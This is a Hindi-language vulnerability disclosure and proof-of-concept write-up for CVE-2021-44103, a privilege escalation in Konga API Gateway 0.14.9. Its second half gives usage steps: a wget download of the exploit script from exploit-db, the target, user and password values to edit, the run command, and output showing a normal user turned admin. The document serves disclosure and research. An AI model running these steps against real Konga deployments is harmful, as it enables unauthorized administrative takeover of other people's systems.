
CVE-2021-44103 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Konga API Gateway 0.14.9 में ऊर्ध्वाधर विशेषाधिकार वृद्धि प्रदर्शित करता है, जो प्रमाणित उपयोगकर्ताओं को व्यवस्थापक पहुँच प्राप्त करने की अनुमति देता है।
KONGA 0.14.9 के लिए एक प्रूफ ऑफ कॉन्सेप्ट - विशेषाधिकार वृद्धि।
16 नवंबर, 2021 को, Fabrício Salomão और मैंने Konga API गेटवे में एक भेद्यता पाई, जो किसी भी प्रमाणित उपयोगकर्ता को प्रशासक बनने की अनुमति देती है।
उत्पाद: KONGA
मॉडल: 0.14.9
भेद्यता: विशेषाधिकार वृद्धि
प्रभाव: पूर्ण व्यवस्थापक पहुंच (ऊर्ध्वाधर विशेषाधिकार वृद्धि)
प्रमाणीकरण: आवश्यक
शोषण लेखक: Fabricio Salomao / Paulo Trindade
नीचे "usernormal" नाम का एक सामान्य उपयोगकर्ता बिना विशेषाधिकार के बनाया गया है।


नीचे दिए गए अनुरोध के माध्यम से पैरामीटर "admin" में फ्लैग "FALSE" को "TRUE" में बदल दिया गया।

इसलिए हमारे लिए एक शोषण बनाया गया : https://www.exploit-db.com/exploits/50521

शोषण चलाने के बाद, विशेषाधिकार वृद्धि सफल रही!
परिणाम:

wget https://www.exploit-db.com/raw/50521 -O 50521.py
Edit 50521.py
Modify:
urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga" # change user
password = "changeme" # change password
Execute:
python 50521.py
[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success
http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html
https://www.exploit-db.com/exploits/50521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103
https://github.com/advisories/GHSA-f2mp-8fgg-7465
https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821